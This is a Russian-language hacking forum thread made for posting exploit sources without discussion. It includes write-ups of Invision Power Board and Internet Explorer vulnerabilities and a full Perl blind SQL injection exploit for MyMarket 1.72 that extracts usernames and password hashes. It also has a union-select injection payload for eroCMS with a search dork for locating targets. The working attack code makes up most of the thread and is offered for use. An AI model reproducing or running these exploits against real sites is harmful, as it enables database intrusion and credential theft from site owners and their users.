Exploits скачать бесплатно программу фильм mp3 русификатор

Каскадный · Стандартный · [ Линейный ]

Exploits, Постим эксплойты

Подписка на тему | Сообщить другу | Версия для печати

8.03.2006 - 22:46

Отправлено #1

de1ay

Cardable Unit
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 3.840
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010

Респектов: 610
-----XXXX-

Тема создана для того, что-бы закидывать сюда исходники свежих сплойтов!
Никаких обсуждений в данной теме не ведём! Только описание сплойта, линк с исходниками или исходники,

Межсайтовый скриптинг и SQL-инъекция в Invision Power Board (2.0.0 - 2.1.4)

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в файлах куки. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.

2. Уязвимость существует из-за недостаточной обработки входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Сплойт:

» Exploit «

Ответов(20 - 23)

15.11.2006 - 2:24 Отправлено #21
*Love.sys* Коксохим Профиль Группа: Наши Люди Сообщений: 1.340 Регистрация: 23.08.2005 Из: Подольск Пользователь №: 12.345 Респектов: 186	Exploit Get SYSTEM SHELL PORT 8080 WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303

28.03.2007 - 14:50

Отправлено #22

kolovrat

Опытный юзверь

Профиль
Группа: Пользователи
Сообщений: 80
Регистрация: 11.08.2006
Пользователь №: 209.442

Респектов: 3
-----X----

Предупреждений:

В Сети опубликован код эксплойта, использующего уязвимость в Microsoft IE. Код опубликован человеком с ником Milw0rm на своей одноименной веб-странице.

Уязвимость, которую использует эксплойт, может использоваться для несанкционированного запуска программного кода на компьютере на целевом компьютере, на котором не установлен соответствующий патч от Microsoft.

Уязвимость была обнаружена довольно давно security-экспертом HD Moore, и еще в июле прошлого года им же был опубликован код, вызывающий «крах» браузера. Microsoft выпустила соответствующее обновление в феврале 2007 года, но, по мнению аналитиков WebSense, уязвимость все еще актуальна и хакеры еще раз обратят на нее пристальное внимание в связи с выходом эксплойта.

Эксперты eEye отметили, что код Milw0rm работает для IE 6, но не функционирует под IE 7, и сообщили, что обновленная версия эксплойта, работающая и для новейшего браузера, будет опубликована позднее.

Оригинальный код эксплойта использует ошибку в функции NextRecordset() библиотеки msado15.dll и, в случае успеха, запускает calc.exe.

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

Сообщение отредактировал kolovrat - 28.03.2007 - 14:54

13.11.2007 - 7:31

Отправлено #23

Teshka

Ленивая совесть
[SoftoRooMTeaM] Group Icon

Профиль
Группа: Модераторы
Сообщений: 675
Регистрация: 31.03.2004
Пользователь №: 9

Респектов: 212
-----XX---

Цель: Microsoft Internet Explorer
Воздействие: Выполнение произвольного кода

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

18.06.2008 - 15:15 Отправлено #24
*de1ay* Cardable Unit [SoftoRooMTeaM] Профиль Группа: СуперМодераторы Сообщений: 3.840 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010 Респектов: 610	MyMarket 1.72 Цитата \| Quote #http://www.site.de/mymarket/shopping/?id=bluah #Ok when we give $id an unexpected value like this we get an SQL Error. #Union selecting seems not possible... #Exploit needs a valid category id. #The Password is in md5 so exploiting will take an awful lot of time. #You will have to change the content on some sites if there are no categorys. #So I couldnt make it to write a stable expl for all sites using this. # #SQL Injection: #http://[target]/[path]/?id=[SQL] » сплойт « Code #!/usr/bin/perl ###################### # #MyMarket 1.72 Blind SQL Injection Exploit # ###################### # #Bug by: h0yt3r # #Demo: http://mymarket.sourceforge.net/demo/shopping/ # ## ### ## # #http://www.site.de/mymarket/shopping/?id=bluah #Ok when we give $id an unexpected value like this we get an SQL Error. #Union selecting seems not possible... #Exploit needs a valid category id. #The Password is in md5 so exploiting will take an awful lot of time. #You will have to change the content on some sites if there are no categorys. #So I couldnt make it to write a stable expl for all sites using this. # #SQL Injection: #http://[target]/[path]/?id=[SQL] # ####################### # #Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the foreverliving h4ck-y0u Team! # ####################### ####################### use LWP::UserAgent; my $userAgent = LWP::UserAgent->new; usage(); $server = $ARGV[0]; $dir = $ARGV[1]; $id = $ARGV[2]; print"\n"; if (!$id) { die "Read Usage!\n"; } $filename ="index.php"; my $vulnCheck = "http://".$server.$dir.$filename; my $goodSite = $vulnCheck."?id=".$id." and 1=1"; my $badSite = $vulnCheck."?id=".$id." and 1=0"; print"[x]Connecting:"; my $Attack1= $userAgent->get($goodSite); my $Attack2= $userAgent->get($badSite); if($Attack1->is_success) { print " Connected \n"; print "[x]Vulnerable Check: "; ###Will change some times if($Attack1->content !~ m/None /i && $Attack2->content =~ m/None/i) { print "Vulnerable \n"; } else { print "Not Vulnerable"; exit;} } else { print " Connection Failed"; exit; } my $asciiNUM=""; my $length; print "[x]Bruteforcing Length...(if this freezes you have to change the content)\n"; my $lengthCounter = 1; while(1) { my $url = "".$vulnCheck."?id=".$id."%20and%20LENGTH((select%20concat(username,0x3a,password)%20from%20users%20limit%200,1))=".$lengthCounter.""; my $Attack= $userAgent->get($url); my $content = $Attack->content; if($content =~ m/None/i) { $lengthCounter++; } else { $length=$length.$lengthCounter; last; } } my @Daten = ("61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76","77","78","79","7A","3A","5F","31","32","33","34","35","36","37","38","39","30","21","23","2B","28","29","40","2D","F5","25","26","2F","3F"); print "[x]Injecting Black Magic...will take SOME time...\n"; for($b=1;$b<=$length;$b++) { for(my $u=0;$u<53;$u++) { my $url = "".$vulnCheck."?id=".$id."%20and%20substring((select%20concat(username,0x3a,password)%20from%20users%20limit%200,1),".$b.",1)=0x".$Daten[$u].""; my $Attack= $userAgent->get($url); my $content = $Attack->content; if($content !~ m/None/i) { print "[x]Found Char ".$Daten[$u]."\n"; $hex=$hex.$Daten[$u]; last; } } } print "[x]Converting \n"; my $a_str = hex_to_ascii($hex); @login = split(/\:/, $a_str); print "[x]Success! \n"; print " Username: $login[0]\n"; print " Password: $login[1]"; sub hex_to_ascii ($) { (my $str = shift) =~ s/([a-fA-F0-9]{2})/chr(hex $1)/eg; return $str; } sub usage() { print q { ###################################################### MyMarket Remote Blind SQL Injection Exploit -Written by h0yt3r- Usage: MyMarket.pl [Server] [Path] [Category ID] Sample: perl MyMarket.pl www.site.com /shopping/ 1 ###################################################### }; } Mambo Component galleries 1.0 (aid) Remote SQL Injection Vulnerability » Нажмите, для открытия спойлера \| Press to open the spoiler « ######################################################################### #################### Viva IslaM Viva IslaM ############################## ## ## Remote SQL Injection Vulnerability ## ## eroCMS V1.0 - V1.1 - V1.2 - V1.3 - V1.4 ( index.php site ) ## ######################################################################### ######################################################################### ## ## AuTh0r : Mr.SQL ## ## H0ME : WwW.PaL-HaCkEr.CoM ## ## Email : SQL@Hotmail.it ## ## !! SYRIAN HaCkErS !! ######################## ######################## ## ## Script : eroCMS ## ## Vesrion : 1.0 - 1.1 - 1.2 - 1.3 - 1.4 ## ## site : www.erocms.de ## ######################## ######################## ## ## D0rk : "by eroCMS" ## ## ## -(:: SQL :- ## ## www.site.com/ ## index.php?site=-1'+union+select+1,2,concat_ws(0x3a,passwort,email),4,5+from+members+limit+1,1/* ## ## -(:: L!VE DEMO :- ## ## http://demo.erocms.de/index.php?site=-1'+union+select+1,2,concat_ws(0x3a,passwort,email),4,5+from+members+limit+1,1/* ## ####################### ####################### -(:: NOTE :- maybe table users ( members ) columns ( , passwort , email , ) get the user column , USE group by , (( This porno script )) ################################################################################ ####################### ################################################################################ ####################### -(:: !Gr3E3E3E3E3E3E3TzZ! :- :: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs :: ################################################################################ ####################### ################################################################################ ####################### # milw0rm.com [2008-06-17]